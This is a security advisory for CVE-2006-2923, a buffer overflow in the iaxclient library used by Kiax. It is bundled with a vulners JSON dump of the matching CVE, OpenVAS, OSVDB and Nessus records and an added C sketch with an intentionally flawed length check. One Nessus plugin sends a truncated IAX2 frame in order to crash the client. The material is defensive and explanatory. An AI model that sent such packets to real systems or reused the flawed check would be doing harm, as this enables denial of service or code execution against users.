The iax_net_read function in the iaxclient library fails to properly
handle IAX2 packets with truncated full frames or mini-frames. These
frames are detected in a length check but processed anyway, leading to
buffer overflows.
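An added illustration of the bug class described above, not code from iaxclient or from this advisory: a receive path that notices a truncated frame but keeps going, next to a form that rejects it before any length arithmetic. The header sizes (12-byte full frame, 4-byte mini-frame) follow RFC 5456; the function names and sample bytes are constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* IAX2 header sizes (RFC 5456): full frame 12 bytes, mini-frame 4 bytes.
 * Meta frames are not modelled in this sketch. */
#define FULL_HDR_LEN 12
#define MINI_HDR_LEN 4

enum frame_kind { FRAME_REJECTED = -1, FRAME_MINI = 0, FRAME_FULL = 1 };

struct parsed_frame {
    enum frame_kind kind;
    const uint8_t *payload;   /* points into the caller's receive buffer */
    size_t payload_len;
};

/* Constructed sample datagrams (not captured traffic). */
const uint8_t SAMPLE_FULL[12]     = {0x80, 0x01, 0, 0, 0, 0, 0, 0, 0, 0, 6, 0x1e};
const uint8_t SAMPLE_TRUNCATED[7] = {0x80, 0x01, 0, 0, 0, 0, 0};
const uint8_t SAMPLE_MINI[6]      = {0x00, 0x01, 0x12, 0x34, 0xaa, 0xbb};

/* Flawed pattern (hypothetical): the short datagram is detected and
 * logged, but nothing stops processing. */
long flawed_payload_len(const uint8_t *buf, int received)
{
    int hdr = (received > 0 && (buf[0] & 0x80)) ? FULL_HDR_LEN : MINI_HDR_LEN;
    if (received < hdr)
        fprintf(stderr, "short frame: %d < %d\n", received, hdr);
    /* BUG: no return above, so this is negative for truncated input and
     * becomes a huge value once converted to size_t for a copy. */
    return (long)received - hdr;
}

/* Hardened pattern: unsigned sizes, and a failed length check ends parsing. */
int parse_frame(const uint8_t *buf, size_t received, struct parsed_frame *out)
{
    size_t hdr;

    out->kind = FRAME_REJECTED;
    out->payload = NULL;
    out->payload_len = 0;
    if (buf == NULL || received < MINI_HDR_LEN)
        return -1;                       /* too short for any header */
    hdr = (buf[0] & 0x80) ? FULL_HDR_LEN : MINI_HDR_LEN;  /* 'F' bit */
    if (received < hdr)
        return -1;                       /* truncated full frame: drop it */
    out->kind = (hdr == FULL_HDR_LEN) ? FRAME_FULL : FRAME_MINI;
    out->payload = buf + hdr;
    out->payload_len = received - hdr;   /* cannot underflow: received >= hdr */
    return 0;
}

int main(void)
{
    struct parsed_frame f;
    long bad = flawed_payload_len(SAMPLE_TRUNCATED, (int)sizeof SAMPLE_TRUNCATED);

    printf("flawed: len=%ld, as size_t=%zu\n", bad, (size_t)bad);
    printf("hardened, truncated: %d\n",
           parse_frame(SAMPLE_TRUNCATED, sizeof SAMPLE_TRUNCATED, &f));
    printf("hardened, full: %d\n", parse_frame(SAMPLE_FULL, sizeof SAMPLE_FULL, &f));
    return 0;
}
```
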

Impact

By sending a specially crafted IAX2 packet, an attacker could execute
arbitrary code with the permissions of the user running Kiax.

Workaround

There is no known workaround at this time.

Resolution

All Kiax users should upgrade to the latest version:

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
{"id": "SECURITYVULNS:DOC:13380", "bulletinFamily": "software", "title": "[Full-disclosure] [ GLSA 200606-30 ] Kiax: Arbitrary code execution", "description": "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\nGentoo Linux Security Advisory GLSA 200606-30\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n http://security.gentoo.org/\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\n Severity: Normal\r\n Title: Kiax: Arbitrary code execution\r\n Date: June 30, 2006\r\n Bugs: #136099\r\n ID: 200606-30\r\n\r\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\r\n\r\nSynopsis\r\n========\r\n\r\nA security vulnerability in the iaxclient library could lead to the\r\nexecution of arbitrary code by a remote attacker.\r\n\r\nBackground\r\n==========\r\n\r\nKiax is a graphical softphone supporting the IAX protocol (Inter\r\nAsterisk eXchange), which allows PC users to make VoIP calls to\r\nAsterisk servers.\r\n\r\nAffected packages\r\n=================\r\n\r\n -------------------------------------------------------------------\r\n Package / Vulnerable / Unaffected\r\n -------------------------------------------------------------------\r\n 1 net-misc/kiax < 0.8.5_p1 >= 0.8.5_p1\r\n\r\nDescription\r\n===========\r\n\r\nThe iax_net_read function in the iaxclient library fails to properly\r\nhandle IAX2 packets with truncated full frames or mini-frames. 
These\r\nframes are detected in a length check but processed anyway, leading to\r\nbuffer overflows.\r\n\r\nImpact\r\n======\r\n\r\nBy sending a specially crafted IAX2 packet, an attacker could execute\r\narbitrary code with the permissions of the user running Kiax.\r\n\r\nWorkaround\r\n==========\r\n\r\nThere is no known workaround at this time.\r\n\r\nResolution\r\n==========\r\n\r\nAll Kiax users should upgrade to the latest version:\r\n\r\n # emerge --sync\r\n # emerge --ask --oneshot --verbose ">=net-misc/kiax-0.8.5_p1"\r\n\r\nReferences\r\n==========\r\n\r\n [ 1 ] CVE-2006-2923\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2923\r\n\r\nAvailability\r\n============\r\n\r\nThis GLSA and any updates to it are available for viewing at\r\nthe Gentoo Security Website:\r\n\r\n http://security.gentoo.org/glsa/glsa-200606-30.xml\r\n\r\nConcerns?\r\n=========\r\n\r\nSecurity is a primary focus of Gentoo Linux and ensuring the\r\nconfidentiality and security of our users machines is of utmost\r\nimportance to us. 
Any security concerns should be addressed to\r\nsecurity@gentoo.org or alternatively, you may file a bug at\r\nhttp://bugs.gentoo.org.\r\n\r\nLicense\r\n=======\r\n\r\nCopyright 2006 Gentoo Foundation, Inc; referenced text\r\nbelongs to its owner(s).\r\n\r\nThe contents of this document are licensed under the\r\nCreative Commons - Attribution / Share Alike license.\r\n\r\nhttp://creativecommons.org/licenses/by-sa/2.5", "published": "2006-06-30T00:00:00", "modified": "2006-06-30T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13380", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2006-2923"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 2, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2018-08-31T11:10:18", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-2923"]}, {"type": "osvdb", "idList": ["OSVDB:26176"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-200606-30.NASL", "IAXCLIENT_TRUNCATED_FRAMES_OVERFLOW.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:57842"]}, {"type": "gentoo", "idList": ["GLSA-200606-30"]}], "modified": "2018-08-31T11:10:18", "rev": 2}, "vulnersScore": 6.9}, "affectedSoftware": []}
{"cve": [{"lastseen": "2020-10-03T11:48:15", "description": "The iax_net_read function in the iaxclient open source library, as used in multiple products including (a) LoudHush 1.3.6, (b) IDE FISK 1.35 and earlier, (c) Kiax 0.8.5 and earlier, (d) DIAX, (e) Ziaxphone, (f) IAX Phone, (g) X-lite, (h) MediaX, (i) Extreme Networks ePhone, and (j) iaxComm before 1.2.0, allows remote attackers to execute arbitrary code via crafted IAX 2 (IAX2) packets with truncated (1) full frames or (2) mini-frames, which are detected in a length check but still processed, leading to buffer overflows related to negative length values.", "edition": 3, "cvss3": {}, "published": "2006-06-09T10:02:00", "title": "CVE-2006-2923", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2923"], "modified": "2018-10-18T16:43:00", "cpe": ["cpe:/a:loudhush:loudhush:1.3.6"], "id": "CVE-2006-2923", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2923", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:loudhush:loudhush:1.3.6:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:42", "bulletinFamily": "unix", "cvelist": ["CVE-2006-2923"], "edition": 1, "description": "### Background\n\nKiax is a graphical softphone supporting the IAX protocol (Inter Asterisk eXchange), which allows PC users to make VoIP calls to Asterisk servers. 
\n\n### Description\n\nThe iax_net_read function in the iaxclient library fails to properly handle IAX2 packets with truncated full frames or mini-frames. These frames are detected in a length check but processed anyway, leading to buffer overflows. \n\n### Impact\n\nBy sending a specially crafted IAX2 packet, an attacker could execute arbitrary code with the permissions of the user running Kiax. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Kiax users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/kiax-0.8.5_p1\"", "modified": "2006-06-30T00:00:00", "published": "2006-06-30T00:00:00", "id": "GLSA-200606-30", "href": "https://security.gentoo.org/glsa/200606-30", "type": "gentoo", "title": "Kiax: Arbitrary code execution", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2923"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200606-30.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:57842", "href": "http://plugins.openvas.org/nasl.php?oid=57842", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200606-30 (kiax)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A security vulnerability in the iaxclient library could lead to the\nexecution of arbitrary code by a remote attacker.\";\ntag_solution = \"All Kiax users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/kiax-0.8.5_p1'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200606-30\nhttp://bugs.gentoo.org/show_bug.cgi?id=136099\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200606-30.\";\n\n \n\nif(description)\n{\n script_id(57842);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2006-2923\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_name(\"Gentoo Security Advisory GLSA 200606-30 (kiax)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-misc/kiax\", unaffected: make_list(\"ge 0.8.5_p1\"), vulnerable: make_list(\"lt 0.8.5_p1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2021-01-07T10:52:06", "description": "The remote host is affected by the vulnerability described in GLSA-200606-30\n(Kiax: Arbitrary code execution)\n\n The iax_net_read function in the iaxclient library fails to properly\n handle IAX2 packets with truncated full frames or mini-frames. 
These\n frames are detected in a length check but processed anyway, leading to\n buffer overflows.\n \nImpact :\n\n By sending a specially crafted IAX2 packet, an attacker could execute\n arbitrary code with the permissions of the user running Kiax.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "published": "2006-07-03T00:00:00", "title": "GLSA-200606-30 : Kiax: Arbitrary code execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2923"], "modified": "2006-07-03T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:kiax"], "id": "GENTOO_GLSA-200606-30.NASL", "href": "https://www.tenable.com/plugins/nessus/21791", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200606-30.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(21791);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-2923\");\n script_xref(name:\"GLSA\", value:\"200606-30\");\n\n script_name(english:\"GLSA-200606-30 : Kiax: Arbitrary code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200606-30\n(Kiax: Arbitrary code execution)\n\n The iax_net_read function in the iaxclient library fails to properly\n handle IAX2 packets with truncated full frames or mini-frames. These\n frames are detected in a length check but processed anyway, leading to\n buffer overflows.\n \nImpact :\n\n By sending a specially crafted IAX2 packet, an attacker could execute\n arbitrary code with the permissions of the user running Kiax.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200606-30\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Kiax users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/kiax-0.8.5_p1'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:kiax\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/03\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/kiax\", unaffected:make_list(\"ge 0.8.5_p1\"), vulnerable:make_list(\"lt 0.8.5_p1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Kiax\");\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-01T03:16:14", "description": "The remote host appears to be using a VoIP software phone application\nthat is affected by multiple buffer overflows. 
With specially crafted\nUDP packets, an unauthenticated, remote attacker may be able to\nleverage these issues to crash the affected application or to execute\narbitrary code on the remote host subject to the privileges of the\nuser running it.", "edition": 23, "published": "2006-06-12T00:00:00", "title": "IAXClient Open Source Library iax_net_read Function Packet Handling Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-2923"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "IAXCLIENT_TRUNCATED_FRAMES_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/21684", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21684);\n script_version(\"1.19\");\n\n script_cve_id(\"CVE-2006-2923\");\n script_bugtraq_id(18307);\n\n script_name(english:\"IAXClient Open Source Library iax_net_read Function Packet Handling Remote Overflow\");\n script_summary(english:\"Tries to crash IAXClient application\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote softphone is prone to multiple buffer overflow attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host appears to be using a VoIP software phone application\nthat is affected by multiple buffer overflows. 
With specially crafted\nUDP packets, an unauthenticated, remote attacker may be able to\nleverage these issues to crash the affected application or to execute\narbitrary code on the remote host subject to the privileges of the\nuser running it.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.secureauth.com/?idx=548&idxseccion=10\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/436638/30/0/threaded\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Obtain to a version of the client application built using a version of\nIAXClient from June 6 2006 or later.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/06/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/06/06\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_end_attributes();\n\n\n script_category(ACT_DENIAL);\n script_family(english:\"Gain a shell remotely\");\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"iax2_detection.nasl\");\n script_require_ports(\"Services/udp/iax2\", 4569);\n\n exit(0);\n}\n\n\ninclude(\"byte_func.inc\");\n\nport = get_kb_item(\"Services/udp/iax2\");\nif (!port) port = 4569;\nif (! 
get_udp_port_state(port)) exit(0, \"UDP port \"+port+\" is not open.\");\n\nsoc = open_sock_udp(port);\n\n\n# Verify client responds to a POKE message.\npoke = \n mkword(0x8000) + # 'F' bit + source call number\n mkword(0) + # 'R' bit + dest call number\n mkdword(0) + # timestamp\n mkbyte(0) + # OSeqno\n mkbyte(0) + # ISeqno\n mkbyte(6) + # frametype, 6 => IAX frame\n mkbyte(0x1E); # 'C' bit + subclass, 0x1e => POKE request\nsend(socket:soc, data:poke);\nres = recv(socket:soc, length:128);\nif (\n strlen(res) != 12 ||\n ord(res[10]) != 6 ||\n (ord(res[11]) != 3 && ord(res[11]) != 4)\n) exit(0);\n\n\n# Send a packet in preparation of an exploit.\ntxcnt = \n mkword(0x8000 | rand()) +\n mkword(0) +\n mkdword(rand()) +\n mkbyte(0) +\n mkbyte(0) +\n mkbyte(6) +\n mkbyte(0x17);\nsend(socket:soc, data:txcnt);\nres = recv(socket:soc, length:128);\n\n\n# Now exploit the flaw to crash the app.\ntxcnt = substr(txcnt, 0, strlen(txcnt)-2);\nsend(socket:soc, data:txcnt);\nres = recv(socket:soc, length:128);\n\n\n# Try to reconnect and send another POKE message to see if it's still up.\nsend(socket:soc, data:poke);\nres = recv(socket:soc, length:128);\nif (strlen(res) == 0) security_warning(port:port, protocol:\"udp\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "cvelist": ["CVE-2006-2923"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://iaxclient.sourceforge.net/\nVendor Specific News/Changelog Entry: http://sourceforge.net/forum/forum.php?forum_id=577612\nVendor Specific News/Changelog Entry: http://www.loudhush.ro/changelog.txt\n[Secunia Advisory ID:20900](https://secuniaresearch.flexerasoftware.com/advisories/20900/)\n[Secunia Advisory ID:20567](https://secuniaresearch.flexerasoftware.com/advisories/20567/)\n[Secunia Advisory ID:20623](https://secuniaresearch.flexerasoftware.com/advisories/20623/)\n[Secunia 
Advisory ID:20466](https://secuniaresearch.flexerasoftware.com/advisories/20466/)\n[Secunia Advisory ID:20560](https://secuniaresearch.flexerasoftware.com/advisories/20560/)\nOther Advisory URL: http://www.coresecurity.com/common/showdoc.php?idx=548&idxseccion=10\nOther Advisory URL: http://www.gentoo.org/security/en/glsa/glsa-200606-30.xml\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0130.html\nFrSIRT Advisory: ADV-2006-2286\nFrSIRT Advisory: ADV-2006-2284\nFrSIRT Advisory: ADV-2006-2180\nFrSIRT Advisory: ADV-2006-2285\n[CVE-2006-2923](https://vulners.com/cve/CVE-2006-2923)\nBugtraq ID: 18307\n", "modified": "2006-06-06T11:19:22", "published": "2006-06-06T11:19:22", "href": "https://vulners.com/osvdb/OSVDB:26176", "id": "OSVDB:26176", "type": "osvdb", "title": "IAXClient Open Source Library iax_net_read Function Crafted Packet Arbitrary Code Execution", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}